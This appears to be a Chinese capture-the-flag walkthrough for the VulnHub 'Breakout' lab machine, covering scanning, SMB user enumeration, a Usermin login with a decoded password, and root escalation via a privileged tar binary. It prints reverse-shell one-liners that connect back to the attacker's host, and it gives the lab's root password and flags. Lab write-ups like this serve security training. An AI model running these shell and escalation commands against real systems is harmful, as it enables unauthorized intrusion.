vulnhub靶机22 02-Breakout.zip

简介: vulnhub靶机22 02-Breakout.zip

靶机下载地址https://download.vulnhub.com/empire/02-Breakout.zip

难度: 简单


网络模式:桥接

IP 地址:自动分配


环境搭建


vmware  靶机 ip:192.168.43.56


647167cf9ac543579bfa715ced30dbfb.png


vmware 攻击机kali 192.168.43.191


ce0a11c038d146cfa3913d63afdd914d.png


信息收集


扫描靶机

arp-scan -l


扫描到同一网段的靶机,确认mac地址


扫描端口开放情况


nmap -A 192.168.43.56 -p- -sS -sV -T4

3cd8f92609954795a73a716cb5b82ec9.png

扫描到开放的端口为80 139 445 10000 20000


挖掘思路——根据端口开放情况查找对应服务的漏洞

  • apache 2.4.51
  • smb 4.6.2
  • webmin

访问80端口:

查看网页源码,发现一串秘文


3c96eecb97a247e4ae46912724f5e267.png搜索对应在线解密网站,得到一串数字

.2uqPEfj3D<P'a-3

bd1e0883ba634dda9d7c7d8cfadd7c80.png

访问10000端口和20000端口


  1. 发现是登录界面,需要账号和密码


8d1827be564a4edab1874ff4ce682ea0.png

 

2.通过弱口令密码尝试,登录失败


3.由于之前nmap扫描出来系统装了 Samba 软件,所以用 Enum4linux 扫描一下 SMB 服务器中的用户:

enum4linux -a 192.168.43.56

扫描出一个用户,用户名为cyber


4c9d6977afc54a818752e65bd931133d.png


登录


试着用之前解密的一段密码 结合 samba账号的用户名登录10000和20000端口的网页


10000端口 登陆失败


801c77b348944c5395f378707fa75513.png


20000端口 登陆成功

deb232843d2e4c61b8ae8edfb41dd231.png



登录之后发现左下角可以执行系统命令

aa4137f007c64ad7b8b74f4d5cbfe646.png


反弹shell


外网机器执行 kali打开端口监听


nc -lvp 8888    //外网机器执行

内网机器执行


bash -i >& /dev/tcp/192.168.43.191/8888 0>&1   //内网机器执行


或者在 bash 下执行是没问题的但是在其他 shell 下执行会报错所以更健壮的写法是


bash -c 'bash -i >& /dev/tcp/外网机器IP/8787 0>&1'


实际上还可以这样写


bash -c 'bash -i &> /dev/tcp/外网机器IP/8787 <&1'


fd63288bca4d4b31b59a4981f70b0081.png


注:以上三条shell选择一条即可


提权


反弹成功 内网机器反弹到外网 执行系统命令


64bd843498b94d6e92539e520e2a922f.png

第一个flag


 [cyber@breakout ~]$ ls
 [cyber@breakout ~]$ ls -la
 cat user.txt


4631a6b1d47f4c358eed7698c0f0b6c3.png

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}


获取root权限

[cyber@breakout ~]$ ls
......
[cyber@breakout ~]$ cd /var
[cyber@breakout var]$ ls -la
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
usermin
webmin
www
[cyber@breakout var]$ cd backups
[cyber@breakout backups]$ ls
apt.extended_states.0
[cyber@breakout backups]$ cd
[cyber@breakout backups]$ cd
[cyber@breakout backups]$ cd /
[cyber@breakout /]$ cd /var/backups
[cyber@breakout backups]$ ls -la
total 28
drwxr-xr-x  2 root root  4096 Aug  1 10:04 .
drwxr-xr-x 14 root root  4096 Oct 19  2021 ..
-rw-r--r--  1 root root 12732 Oct 19  2021 apt.extended_states.0
-rw-------  1 root root    17 Oct 20  2021 .old_pass.bak
[cyber@breakout backups]$ cd ~
[cyber@breakout ~]$ ./tar -cf bak.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
[cyber@breakout ~]$ tar -xf bak.tar
[cyber@breakout ~]$ ls -la
total 596
drwxr-xr-x  9 cyber cyber   4096 Aug  1 22:33 .
drwxr-xr-x  3 root  root    4096 Oct 19  2021 ..
-rw-r--r--  1 cyber cyber  10240 Aug  1 22:33 bak.tar
-rw-------  1 cyber cyber   1284 Aug  1 22:24 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19  2021 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19  2021 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19  2021 .filemin
drwx------  2 cyber cyber   4096 Oct 19  2021 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19  2021 .local
-rw-r--r--  1 cyber cyber     45 Aug  1 11:30 pass.zip.gz
-rw-r--r--  1 cyber cyber    807 Oct 19  2021 .profile
-rw-r--r--  1 cyber cyber     67 Aug  1 10:38 shell.php
drwx------  2 cyber cyber   4096 Oct 19  2021 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19  2021 tar
drwxr-xr-x  2 cyber cyber   4096 Aug  1 10:38 .tmp
drwx------ 16 cyber cyber   4096 Oct 19  2021 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19  2021 user.txt
drwxr-xr-x  3 cyber cyber   4096 Aug  1 22:33 var


8c10db03e1e640fea98439b73d82bcf3.png

[cyber@breakout ~]$ ./tar -xf bak.tar
[cyber@breakout ~]$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h        //得到root密码


切换账号


su root
Ts&4&YurgtRX(=~h       //root密码


05903cd4e0df4ff6a789a884f54a479a.png

ls
whoami 
发现为root,切换成功

0eda46f0cb8d402c81ca272ab8c35268.png


注:

浏览器执行会错误,需要在外网机器执行

输入密码之后无反应,直接输入whoami 当前用户为root


7166957b02c64c08a77832221833c34f.png


第二个flag

cd ~
ls -la
ls r00t.txt
cat r00t.txt


346785ad7e8941c09aca3113aaad1737.png

3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}


7070886c61c943999cd07d871c3d79e0.png

相关文章
|
安全 Shell C语言
vulnhub-GoldenEye靶机通关wp(二)
vulnhub-GoldenEye靶机通关wp
165 0
vulnhub-GoldenEye靶机通关wp(二)
|
SQL 安全 搜索推荐
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
|
数据安全/隐私保护
vulnhub-GoldenEye靶机通关wp(一)
vulnhub-GoldenEye靶机通关wp
386 0
|
安全 Shell
vulnhub靶场—matrix-breakout-2-morpheus靶机
vulnhub靶场—matrix-breakout-2-morpheus靶机
158 2
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
安全 Shell 网络安全
vulnhub靶机 | DriftingBlues:7 write-up
vulnhub靶机 | DriftingBlues:7 write-up
104 0
|
SQL 算法 安全
BlackRose: 1-VulnHub
BlackRose: 1-VulnHub
|
Shell Apache 数据库
Vulnhub靶场之Me-and-My-Girlfriend(二)
Vulnhub靶场之Me-and-My-Girlfriend
131 0
Vulnhub靶场之Me-and-My-Girlfriend(二)
|
Web App开发 存储 安全
Vulnhub靶场之Me-and-My-Girlfriend(一)
Vulnhub靶场之Me-and-My-Girlfriend
202 0
Vulnhub靶场之Me-and-My-Girlfriend(一)
|
SQL 网络协议 安全
靶机实战-vuluhub系列-pylington:1
靶机实战-vuluhub系列-pylington:1
靶机实战-vuluhub系列-pylington:1